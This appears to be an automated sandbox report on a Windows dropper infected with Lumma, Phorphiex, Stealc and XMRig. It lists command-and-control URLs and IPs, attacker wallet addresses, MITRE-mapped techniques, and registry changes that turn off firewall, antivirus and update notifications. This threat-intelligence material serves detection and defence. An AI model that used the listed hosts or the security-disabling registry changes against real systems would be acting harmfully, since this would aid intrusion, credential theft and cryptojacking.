lumma | dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453

Analysis

max time kernel
146s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/10/2024, 19:45

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe(1).exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Score

10^/10

lumma phorphiex stealc xmrig mainteam credential_access defense_evasion discovery evasion execution loader miner persistence spyware stealer trojan upx worm

Malware Config

Extracted

Family

phorphiex

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes

mutex
mmn7nnm8na
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

stealc

Botnet

mainteam

http://95.182.96.50

Attributes

url_path
/2aced82320799c96.php

Extracted

Family

lumma

https://tryyudjasudqo.shop/api

https://eemmbryequo.shop/api

https://reggwardssdqw.shop/api

https://relaxatinownio.shop/api

https://tesecuuweqo.shop/api

https://tendencctywop.shop/api

https://licenseodqwmqn.shop/api

https://keennylrwmqlw.shop/api

https://deficticoepwqm.shop/api

https://optinewlip.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023cc4-17.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/2488-394-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-393-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-398-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-399-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-397-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-396-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2488-400-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
112	4076	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1968	powershell.exe
2472	powershell.exe
4960	powershell.exe
4204	powershell.exe
2844	powershell.exe
2792	powershell.exe
2196	powershell.exe
4076	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Setup.exe(1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	sysppvrdnvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Edge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe

Executes dropped EXE 24 IoCs

pid	Process
2724	http185.215.113.66pei.exe.exe
3512	httptwizt.netnewtpp.exe.exe
1760	sysppvrdnvs.exe
2120	1734422768.exe
1152	http31.41.244.11filesEDge.exe.exe
4884	Edge.exe
4396	httpsdewatabalirental.com2.exe.exe
5092	httpsdewatabalirental.com1.exe.exe
516	httpsdewatabalirental.com3.exe.exe
1160	httpsdewatabalirental.com4.exe.exe
3640	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
2928	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
1620	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
4584	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
2728	httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
5072	Updater.exe
1092	httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe
1920	httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe
4068	httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe
2192	httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe
2408	httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe
3608	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsUpdatemmmm.exe.exe
4984	Updater.exe

Loads dropped DLL 3 IoCs

pid	Process
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
1920	httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{AB1F3E47-AEF1-400E-A108-233A046C3A34} = "C:\\Users\\Admin\\AppData\\Roaming\\Edge\\Edge.exe {5E0DB032-E9D6-4C1D-A145-C083BA9C5AAA}"	Edge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
218	raw.githubusercontent.com
219	raw.githubusercontent.com
58	bitbucket.org
59	bitbucket.org
206	pastebin.com
207	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3764	powercfg.exe
4136	powercfg.exe
216	powercfg.exe
2268	powercfg.exe
2292	powercfg.exe
4920	powercfg.exe
3772	powercfg.exe
1092	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe
File opened for modification	C:\Windows\system32\MRT.exe	httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe
File opened for modification	C:\Windows\system32\MRT.exe	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsUpdatemmmm.exe.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 516 set thread context of 4516	516	httpsdewatabalirental.com3.exe.exe	130
PID 3640 set thread context of 1216	3640	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe	144
PID 2928 set thread context of 464	2928	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe	147
PID 1620 set thread context of 880	1620	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe	151
PID 4584 set thread context of 3600	4584	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe	153
PID 5072 set thread context of 1640	5072	Updater.exe	204
PID 5072 set thread context of 2488	5072	Updater.exe	205
PID 1920 set thread context of 4576	1920	httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe	211

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2488-389-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-388-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-390-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-394-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-393-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-392-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-391-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-398-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-399-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-397-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-396-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2488-400-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\DetectiveBrowsers	httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe
File opened for modification	C:\Windows\ThrownKnock	httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe

Launches sc.exe 40 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2248	sc.exe
540	sc.exe
2304	sc.exe
5052	sc.exe
2236	sc.exe
4220	sc.exe
1908	sc.exe
2268	sc.exe
3800	sc.exe
4904	sc.exe
1256	sc.exe
4048	sc.exe
2552	sc.exe
2784	sc.exe
116	sc.exe
2024	sc.exe
1920	sc.exe
3776	sc.exe
640	sc.exe
4816	sc.exe
2800	sc.exe
712	sc.exe
2296	sc.exe
2928	sc.exe
4068	sc.exe
3928	sc.exe
2292	sc.exe
2832	sc.exe
2844	sc.exe
3764	sc.exe
1308	sc.exe
1704	sc.exe
2476	sc.exe
3772	sc.exe
2632	sc.exe
4764	sc.exe
2292	sc.exe
940	sc.exe
1200	sc.exe
2024	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
216	5092	WerFault.exe	122

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com2.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com1.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1734422768.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com3.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsdewatabalirental.com4.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	httpsdewatabalirental.com2.exe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	httpsdewatabalirental.com2.exe.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3776	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
4396	httpsdewatabalirental.com2.exe.exe
5092	httpsdewatabalirental.com1.exe.exe
5092	httpsdewatabalirental.com1.exe.exe
4076	powershell.exe
4076	powershell.exe
1628	httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
2196	powershell.exe
2196	powershell.exe
